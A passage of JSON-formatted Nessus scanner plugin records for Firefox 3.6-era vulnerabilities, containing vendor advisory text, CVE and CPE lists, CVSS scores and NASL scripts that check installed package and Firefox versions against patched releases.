audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"devhelp-0.12-21.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"devhelp-devel-0.12-21.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"esc-1.1.0-12.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"firefox-3.6.4-8.0.1.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"gnome-python2-extras-2.14.2-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"gnome-python2-gtkhtml2-2.14.2-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"gnome-python2-gtkmozembed-2.14.2-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"gnome-python2-gtkspell-2.14.2-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"gnome-python2-libegg-2.14.2-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"totem-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"totem-devel-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"totem-mozplugin-2.16.7-7.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-1.9.2.4-9.0.1.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-devel-1.9.2.4-9.0.1.el5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"yelp-2.16.0-26.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"devhelp / devhelp-devel / esc / firefox / gnome-python2-extras / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:08:02", "description": "The installed version of Firefox 3.6.x is earlier than 3.6.2. Such\nversions are potentially affected by multiple security issues :\n \n - The WOFF decoder contains an integer overflow in a font\n decompression routine. (MFSA 2010-08)\n\n - Deleted image frames are reused when handling\n 'multipart/x-mixed-replace' images. (MFSA 2010-09)\n\n - The 'window.location' object is made a normal \n overridable object. (MFSA 2010-10)\n\n - Multiple crashes can result in arbitrary code execution.\n (MFSA 2010-11)\n\n - A cross-site scripting issue when using\n 'addEventListener' and 'setTimeout' on a wrapped object. \n (MFSA 2010-12)\n\n - Documents fail to call certain security checks when\n attempting to preload images. (MFSA 2010-13)\n\n - It is possible to corrupt a user's XUL cache. \n (MFSA 2010-14)\n\n - The asynchronous Authorization Prompt is not always\n attached to the correct window. (MFSA 2010-15)\n \n - Multiple crashes can result in arbitrary code execution.\n (MFSA 2010-16)\n\n - An error exists in the way '<option>' elements are\n inserted into a XUL tree '<optgroup>' (MFSA 2010-18)\n\n - An error exists in the implementation of the\n 'windows.navigator.plugins' object. (MFSA 2010-19)\n\n - A browser applet can be used to turn a simple mouse\n click into a drag-and-drop action, potentially resulting\n in the unintended loading of resources in a user's\n browser. (MFSA 2010-20)\n\n - Session renegotiations are not handled properly, which\n can be exploited to insert arbitrary plaintext by a\n man-in-the-middle. (MFSA 2010-22)\n\n - When an image points to a resource that redirects to a\n 'mailto:' URL, the external mail handler application is \n launched. (MFSA 2010-23)\n \n - XML documents fail to call certain security checks when\n loading new content. (MFSA 2010-024)", "edition": 27, "published": "2010-03-23T00:00:00", "title": "Firefox 3.6.x < 3.6.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0171", "CVE-2010-0169"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_362.NASL", "href": "https://www.tenable.com/plugins/nessus/45133", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45133);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2009-3555\",\n \"CVE-2010-0164\",\n \"CVE-2010-0165\",\n \"CVE-2010-0167\",\n \"CVE-2010-0168\",\n \"CVE-2010-0169\",\n \"CVE-2010-0170\",\n \"CVE-2010-0171\",\n \"CVE-2010-0172\",\n \"CVE-2010-0173\",\n \"CVE-2010-0174\",\n \"CVE-2010-0176\",\n \"CVE-2010-0177\",\n \"CVE-2010-0178\",\n \"CVE-2010-0181\",\n \"CVE-2010-0182\",\n \"CVE-2010-1028\"\n );\n script_bugtraq_id(\n 36935,\n 38298,\n 38919,\n 38920,\n 38921,\n 38922,\n 38927,\n 38939,\n 38944,\n 38946,\n 39133,\n 39137,\n 39122,\n 39123,\n 39125,\n 39128,\n 39479\n );\n script_xref(name:\"Secunia\", value:\"38608\");\n\n script_name(english:\"Firefox 3.6.x < 3.6.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Firefox\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The remote Windows host contains a web browser that is affected by\nMultiple Vulnerabilities\");\n script_set_attribute(attribute:\"description\",value:\n\"The installed version of Firefox 3.6.x is earlier than 3.6.2. Such\nversions are potentially affected by multiple security issues :\n \n - The WOFF decoder contains an integer overflow in a font\n decompression routine. (MFSA 2010-08)\n\n - Deleted image frames are reused when handling\n 'multipart/x-mixed-replace' images. (MFSA 2010-09)\n\n - The 'window.location' object is made a normal \n overridable object. (MFSA 2010-10)\n\n - Multiple crashes can result in arbitrary code execution.\n (MFSA 2010-11)\n\n - A cross-site scripting issue when using\n 'addEventListener' and 'setTimeout' on a wrapped object. \n (MFSA 2010-12)\n\n - Documents fail to call certain security checks when\n attempting to preload images. (MFSA 2010-13)\n\n - It is possible to corrupt a user's XUL cache. \n (MFSA 2010-14)\n\n - The asynchronous Authorization Prompt is not always\n attached to the correct window. (MFSA 2010-15)\n \n - Multiple crashes can result in arbitrary code execution.\n (MFSA 2010-16)\n\n - An error exists in the way '<option>' elements are\n inserted into a XUL tree '<optgroup>' (MFSA 2010-18)\n\n - An error exists in the implementation of the\n 'windows.navigator.plugins' object. (MFSA 2010-19)\n\n - A browser applet can be used to turn a simple mouse\n click into a drag-and-drop action, potentially resulting\n in the unintended loading of resources in a user's\n browser. (MFSA 2010-20)\n\n - Session renegotiations are not handled properly, which\n can be exploited to insert arbitrary plaintext by a\n man-in-the-middle. (MFSA 2010-22)\n\n - When an image points to a resource that redirects to a\n 'mailto:' URL, the external mail handler application is \n launched. (MFSA 2010-23)\n \n - XML documents fail to call certain security checks when\n loading new content. (MFSA 2010-024)\");\n \n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-08/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-09/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-10/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-11/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-12/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-13/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-14/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-15/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-16/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-18/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-19/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-20/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-22/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-23/\");\n script_set_attribute(attribute:\"see_also\",value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2010-24/\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?9a64eb33\");\n script_set_attribute(attribute:\"solution\",value:\"Upgrade to Firefox 3.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2010/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2010/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/03/23\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\"); \n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'3.6.2', min:'3.6', severity:SECURITY_HOLE);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:52:36", "description": "Security issues were identified and fixed in firefox :\n\nSecurity researcher regenrecht reported (via TippingPoint's Zero Day\nInitiative) a potential reuse of a deleted image frame in Firefox\n3.6's handling of multipart/x-mixed-replace images. Although no\nexploit was shown, re-use of freed memory has led to exploitable\nvulnerabilities in the past (CVE-2010-0164).\n\nMozilla developers identified and fixed several stability bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these crashes showed evidence of memory corruption under certain\ncircumstances and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2010-0165,\nCVE-2010-0167).\n\nMozilla developer Josh Soref of Nokia reported that documents failed\nto call certain security checks when attempting to preload images.\nAlthough the image content is not available to the page, it is\npossible to specify protocols that are normally not allowed in a web\npage such as file:. This includes internal schemes implemented by\nadd-ons that might perform privileged actions resulting in something\nlike a Cross-Site Request Forgery (CSRF) attack against the add-on.\nPotential severity would depend on the add-ons installed\n(CVE-2010-0168).\n\nMozilla developer Blake Kaplan reported that the window.location\nobject was made a normal overridable JavaScript object in the Firefox\n3.6 browser engine (Gecko 1.9.2) because new mechanisms were developed\nto enforce the same-origin policy between windows and frames. This\nobject is unfortunately also used by some plugins to determine the\npage origin used for access restrictions. A malicious page could\noverride this object to fool a plugin into granting access to data on\nanother site or the local file system. The behavior of older Firefox\nversions has been restored (CVE-2010-0170).\n\nMozilla developer Justin Dolske reported that the new asynchronous\nAuthorization Prompt (HTTP username and password) was not always\nattached to the correct window. Although we have not demonstrated\nthis, it may be possible for a malicious page to convince a user to\nopen a new tab or popup to a trusted service and then have the HTTP\nauthorization prompt from the malicious page appear to be the login\nprompt for the trusted page. This potential attack is greatly\nmitigated by the fact that very few websites use HTTP authorization,\npreferring instead to use web forms and cookies (CVE-2010-0172).\n\nUnspecified vulnerability in Mozilla Firefox 3.5.x through 3.5.8\nallows remote attackers to cause a denial of service (memory\ncorruption and application crash) and possibly have unknown other\nimpact via vectors that might involve compressed data, a different\nvulnerability than CVE-2010-1028 (CVE-2010-1122).\n\nMozilla developers identified and fixed several stability bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these crashes showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2010-0173,\nCVE-2010-0174)\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative that a select event handler for XUL tree items could be\ncalled after the tree item was deleted. This results in the execution\nof previously freed memory which an attacker could use to crash a\nvictim's browser and run arbitrary code on the victim's computer\n(CVE-2010-0175).\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative an error in the way <option> elements are inserted into a\nXUL tree <optgroup>. In certain cases, the number of references to an\n<option> element is under-counted so that when the element is deleted,\na live pointer to its old location is kept around and may later be\nused. An attacker could potentially use these conditions to run\narbitrary code on a victim's computer (CVE-2010-0176).\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative an error in the implementation of the\nwindow.navigator.plugins object. When a page reloads, the plugins\narray would reallocate all of its members without checking for\nexisting references to each member. This could result in the deletion\nof objects for which valid pointers still exist. An attacker could use\nthis vulnerability to crash a victim's browser and run arbitrary code\non the victim's machine (CVE-2010-0177).\n\nSecurity researcher Paul Stone reported that a browser applet could be\nused to turn a simple mouse click into a drag-and-drop action,\npotentially resulting in the unintended loading of resources in a\nuser's browser. This behavior could be used twice in succession to\nfirst load a privileged chrome: URL in a victim's browser, then load a\nmalicious javascript: URL on top of the same document resulting in\narbitrary script execution with chrome privileges (CVE-2010-0178).\n\nMozilla security researcher moz_bug_r_a4 reported that the\nXMLHttpRequestSpy module in the Firebug add-on was exposing an\nunderlying chrome privilege escalation vulnerability. When the\nXMLHttpRequestSpy object was created, it would attach various\nproperties of itself to objects defined in web content, which were not\nbeing properly wrapped to prevent their exposure to chrome privileged\nobjects. This could result in an attacker running arbitrary JavaScript\non a victim's machine, though it required the victim to have Firebug\ninstalled, so the overall severity of the issue was determined to be\nHigh (CVE-2010-0179).\n\nphpBB developer Henry Sudhof reported that when an image tag points to\na resource that redirects to a mailto: URL, the external mail handler\napplication is launched. This issue poses no security threat to users\nbut could create an annoyance when browsing a site that allows users\nto post arbitrary images (CVE-2010-0181).\n\nMozilla community member Wladimir Palant reported that XML documents\nwere failing to call certain security checks when loading new content.\nThis could result in certain resources being loaded that would\notherwise violate security policies set by the browser or installed\nadd-ons (CVE-2010-0182).\n\nNote that to benefit from the fix for CVE-2009-3555 added in\nnss-3.12.6, Firefox 3.6 users will need to set their\nsecurity.ssl.require_safe_negotiation preference to true. In Mandriva\nthe default setting is false due to problems with some common sites.\n\nSince firefox-3.0.19 is the last 3.0.x release Mandriva opted to\nprovide the latest 3.6.3 version for Mandriva Linux\n2008.0/2009.0/2009.1/MES5/2010.0.\n\nPackages for 2008.0 and 2009.0 are provided due to the Extended\nMaintenance Program for those products.\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\n\nUpdate :\n\nPackages for 2009.0 are provided due to the Extended Maintenance\nProgram.", "edition": 26, "published": "2010-04-14T00:00:00", "title": "Mandriva Linux Security Advisory : firefox (MDVSA-2010:070-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1122", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0179"], "modified": "2010-04-14T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:firefox-zh_CN", "p-cpe:/a:mandriva:linux:epiphany-devel", "p-cpe:/a:mandriva:linux:lib64devhelp-1_0", "p-cpe:/a:mandriva:linux:libxulrunner-devel", "p-cpe:/a:mandriva:linux:firefox-sv_SE", "p-cpe:/a:mandriva:linux:libsqlite3_0", "p-cpe:/a:mandriva:linux:firefox-sk", "p-cpe:/a:mandriva:linux:sqlite3-tools", "p-cpe:/a:mandriva:linux:tcl-sqlite3", "p-cpe:/a:mandriva:linux:gnome-python-gtkmozembed", "p-cpe:/a:mandriva:linux:firefox-eu", "p-cpe:/a:mandriva:linux:firefox-ext-beagle", "p-cpe:/a:mandriva:linux:firefox-de", "p-cpe:/a:mandriva:linux:firefox-id", "p-cpe:/a:mandriva:linux:firefox", "p-cpe:/a:mandriva:linux:beagle-doc", "p-cpe:/a:mandriva:linux:libdevhelp-1-devel", "p-cpe:/a:mandriva:linux:firefox-sl", "p-cpe:/a:mandriva:linux:firefox-es_ES", "p-cpe:/a:mandriva:linux:firefox-el", "p-cpe:/a:mandriva:linux:libdevhelp-1_0", "p-cpe:/a:mandriva:linux:lib64xulrunner-devel", "p-cpe:/a:mandriva:linux:xulrunner", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:firefox-gl", "p-cpe:/a:mandriva:linux:firefox-ext-scribefire", "p-cpe:/a:mandriva:linux:firefox-fi", "p-cpe:/a:mandriva:linux:firefox-be", "p-cpe:/a:mandriva:linux:firefox-ext-xmarks", "p-cpe:/a:mandriva:linux:firefox-af", "p-cpe:/a:mandriva:linux:firefox-ja", "p-cpe:/a:mandriva:linux:devhelp-plugins", "p-cpe:/a:mandriva:linux:gnome-python-gda", "p-cpe:/a:mandriva:linux:gnome-python-gtkhtml2", "p-cpe:/a:mandriva:linux:firefox-is", "p-cpe:/a:mandriva:linux:firefox-lv", "p-cpe:/a:mandriva:linux:lemon", "p-cpe:/a:mandriva:linux:firefox-pa_IN", "p-cpe:/a:mandriva:linux:firefox-tr", "p-cpe:/a:mandriva:linux:firefox-ga_IE", "p-cpe:/a:mandriva:linux:yelp", "p-cpe:/a:mandriva:linux:firefox-nl", "p-cpe:/a:mandriva:linux:lib64sqlite3_0", "p-cpe:/a:mandriva:linux:firefox-lt", "p-cpe:/a:mandriva:linux:firefox-ext-mozvoikko", "p-cpe:/a:mandriva:linux:firefox-ro", "p-cpe:/a:mandriva:linux:firefox-it", "p-cpe:/a:mandriva:linux:beagle-epiphany", "p-cpe:/a:mandriva:linux:beagle-evolution", "p-cpe:/a:mandriva:linux:firefox-fy", "p-cpe:/a:mandriva:linux:firefox-es_AR", "p-cpe:/a:mandriva:linux:firefox-bn", "p-cpe:/a:mandriva:linux:firefox-sq", "p-cpe:/a:mandriva:linux:firefox-ru", "p-cpe:/a:mandriva:linux:firefox-fr", "p-cpe:/a:mandriva:linux:firefox-zh_TW", "p-cpe:/a:mandriva:linux:lib64sqlite3-devel", "p-cpe:/a:mandriva:linux:firefox-te", "p-cpe:/a:mandriva:linux:firefox-eo", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-beagle", "p-cpe:/a:mandriva:linux:firefox-mk", "p-cpe:/a:mandriva:linux:libsqlite3-devel", "p-cpe:/a:mandriva:linux:lib64devhelp-1-devel", "p-cpe:/a:mandriva:linux:firefox-ca", "p-cpe:/a:mandriva:linux:firefox-bg", "p-cpe:/a:mandriva:linux:firefox-et", "p-cpe:/a:mandriva:linux:epiphany", "p-cpe:/a:mandriva:linux:firefox-si", "p-cpe:/a:mandriva:linux:firefox-pt_PT", "p-cpe:/a:mandriva:linux:lib64xulrunner1.9.2.3", "p-cpe:/a:mandriva:linux:firefox-ext-blogrovr", "p-cpe:/a:mandriva:linux:firefox-cy", "p-cpe:/a:mandriva:linux:beagle", "p-cpe:/a:mandriva:linux:firefox-ko", "p-cpe:/a:mandriva:linux:beagle-gui-qt", "p-cpe:/a:mandriva:linux:firefox-nb_NO", "p-cpe:/a:mandriva:linux:firefox-uk", "p-cpe:/a:mandriva:linux:devhelp", "p-cpe:/a:mandriva:linux:firefox-kn", "p-cpe:/a:mandriva:linux:firefox-devel", "p-cpe:/a:mandriva:linux:beagle-libs", "p-cpe:/a:mandriva:linux:firefox-theme-kfirefox", "p-cpe:/a:mandriva:linux:firefox-ar", "p-cpe:/a:mandriva:linux:firefox-nn_NO", "p-cpe:/a:mandriva:linux:firefox-pt_BR", "p-cpe:/a:mandriva:linux:gnome-python-gdl", "p-cpe:/a:mandriva:linux:lib64sqlite3-static-devel", "p-cpe:/a:mandriva:linux:firefox-da", "p-cpe:/a:mandriva:linux:firefox-hu", "p-cpe:/a:mandriva:linux:firefox-pl", "p-cpe:/a:mandriva:linux:gnome-python-gda-devel", "p-cpe:/a:mandriva:linux:beagle-crawl-system", "p-cpe:/a:mandriva:linux:firefox-gu_IN", "p-cpe:/a:mandriva:linux:firefox-cs", "p-cpe:/a:mandriva:linux:gnome-python-extras", "p-cpe:/a:mandriva:linux:firefox-hi", "p-cpe:/a:mandriva:linux:firefox-th", "p-cpe:/a:mandriva:linux:libxulrunner1.9.2.3", "p-cpe:/a:mandriva:linux:firefox-en_GB", "p-cpe:/a:mandriva:linux:firefox-mr", "p-cpe:/a:mandriva:linux:firefox-he", "p-cpe:/a:mandriva:linux:beagle-gui", "p-cpe:/a:mandriva:linux:libsqlite3-static-devel", "p-cpe:/a:mandriva:linux:gnome-python-gtkspell"], "id": "MANDRIVA_MDVSA-2010-070.NASL", "href": "https://www.tenable.com/plugins/nessus/45520", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:070. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(45520);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0170\", \"CVE-2010-0172\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2010-1122\");\n script_bugtraq_id(39122, 39123, 39124, 39128, 39133, 39137, 39479);\n script_xref(name:\"MDVSA\", value:\"2010:070-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : firefox (MDVSA-2010:070-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security issues were identified and fixed in firefox :\n\nSecurity researcher regenrecht reported (via TippingPoint's Zero Day\nInitiative) a potential reuse of a deleted image frame in Firefox\n3.6's handling of multipart/x-mixed-replace images. Although no\nexploit was shown, re-use of freed memory has led to exploitable\nvulnerabilities in the past (CVE-2010-0164).\n\nMozilla developers identified and fixed several stability bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these crashes showed evidence of memory corruption under certain\ncircumstances and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2010-0165,\nCVE-2010-0167).\n\nMozilla developer Josh Soref of Nokia reported that documents failed\nto call certain security checks when attempting to preload images.\nAlthough the image content is not available to the page, it is\npossible to specify protocols that are normally not allowed in a web\npage such as file:. This includes internal schemes implemented by\nadd-ons that might perform privileged actions resulting in something\nlike a Cross-Site Request Forgery (CSRF) attack against the add-on.\nPotential severity would depend on the add-ons installed\n(CVE-2010-0168).\n\nMozilla developer Blake Kaplan reported that the window.location\nobject was made a normal overridable JavaScript object in the Firefox\n3.6 browser engine (Gecko 1.9.2) because new mechanisms were developed\nto enforce the same-origin policy between windows and frames. This\nobject is unfortunately also used by some plugins to determine the\npage origin used for access restrictions. A malicious page could\noverride this object to fool a plugin into granting access to data on\nanother site or the local file system. The behavior of older Firefox\nversions has been restored (CVE-2010-0170).\n\nMozilla developer Justin Dolske reported that the new asynchronous\nAuthorization Prompt (HTTP username and password) was not always\nattached to the correct window. Although we have not demonstrated\nthis, it may be possible for a malicious page to convince a user to\nopen a new tab or popup to a trusted service and then have the HTTP\nauthorization prompt from the malicious page appear to be the login\nprompt for the trusted page. This potential attack is greatly\nmitigated by the fact that very few websites use HTTP authorization,\npreferring instead to use web forms and cookies (CVE-2010-0172).\n\nUnspecified vulnerability in Mozilla Firefox 3.5.x through 3.5.8\nallows remote attackers to cause a denial of service (memory\ncorruption and application crash) and possibly have unknown other\nimpact via vectors that might involve compressed data, a different\nvulnerability than CVE-2010-1028 (CVE-2010-1122).\n\nMozilla developers identified and fixed several stability bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these crashes showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2010-0173,\nCVE-2010-0174)\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative that a select event handler for XUL tree items could be\ncalled after the tree item was deleted. This results in the execution\nof previously freed memory which an attacker could use to crash a\nvictim's browser and run arbitrary code on the victim's computer\n(CVE-2010-0175).\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative an error in the way <option> elements are inserted into a\nXUL tree <optgroup>. In certain cases, the number of references to an\n<option> element is under-counted so that when the element is deleted,\na live pointer to its old location is kept around and may later be\nused. An attacker could potentially use these conditions to run\narbitrary code on a victim's computer (CVE-2010-0176).\n\nSecurity researcher regenrecht reported via TippingPoint's Zero Day\nInitiative an error in the implementation of the\nwindow.navigator.plugins object. When a page reloads, the plugins\narray would reallocate all of its members without checking for\nexisting references to each member. This could result in the deletion\nof objects for which valid pointers still exist. An attacker could use\nthis vulnerability to crash a victim's browser and run arbitrary code\non the victim's machine (CVE-2010-0177).\n\nSecurity researcher Paul Stone reported that a browser applet could be\nused to turn a simple mouse click into a drag-and-drop action,\npotentially resulting in the unintended loading of resources in a\nuser's browser. This behavior could be used twice in succession to\nfirst load a privileged chrome: URL in a victim's browser, then load a\nmalicious javascript: URL on top of the same document resulting in\narbitrary script execution with chrome privileges (CVE-2010-0178).\n\nMozilla security researcher moz_bug_r_a4 reported that the\nXMLHttpRequestSpy module in the Firebug add-on was exposing an\nunderlying chrome privilege escalation vulnerability. When the\nXMLHttpRequestSpy object was created, it would attach various\nproperties of itself to objects defined in web content, which were not\nbeing properly wrapped to prevent their exposure to chrome privileged\nobjects. This could result in an attacker running arbitrary JavaScript\non a victim's machine, though it required the victim to have Firebug\ninstalled, so the overall severity of the issue was determined to be\nHigh (CVE-2010-0179).\n\nphpBB developer Henry Sudhof reported that when an image tag points to\na resource that redirects to a mailto: URL, the external mail handler\napplication is launched. This issue poses no security threat to users\nbut could create an annoyance when browsing a site that allows users\nto post arbitrary images (CVE-2010-0181).\n\nMozilla community member Wladimir Palant reported that XML documents\nwere failing to call certain security checks when loading new content.\nThis could result in certain resources being loaded that would\notherwise violate security policies set by the browser or installed\nadd-ons (CVE-2010-0182).\n\nNote that to benefit from the fix for CVE-2009-3555 added in\nnss-3.12.6, Firefox 3.6 users will need to set their\nsecurity.ssl.require_safe_negotiation preference to true. In Mandriva\nthe default setting is false due to problems with some common sites.\n\nSince firefox-3.0.19 is the last 3.0.x release Mandriva opted to\nprovide the latest 3.6.3 version for Mandriva Linux\n2008.0/2009.0/2009.1/MES5/2010.0.\n\nPackages for 2008.0 and 2009.0 are provided due to the Extended\nMaintenance Program for those products.\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\n\nUpdate :\n\nPackages for 2009.0 are provided due to the Extended Maintenance\nProgram.\"\n );\n # https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox-3.6/#firefox3.6.3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2a6dd34c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-crawl-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:beagle-doc\");\n script_set_attribute(attribute:\"cpe\", 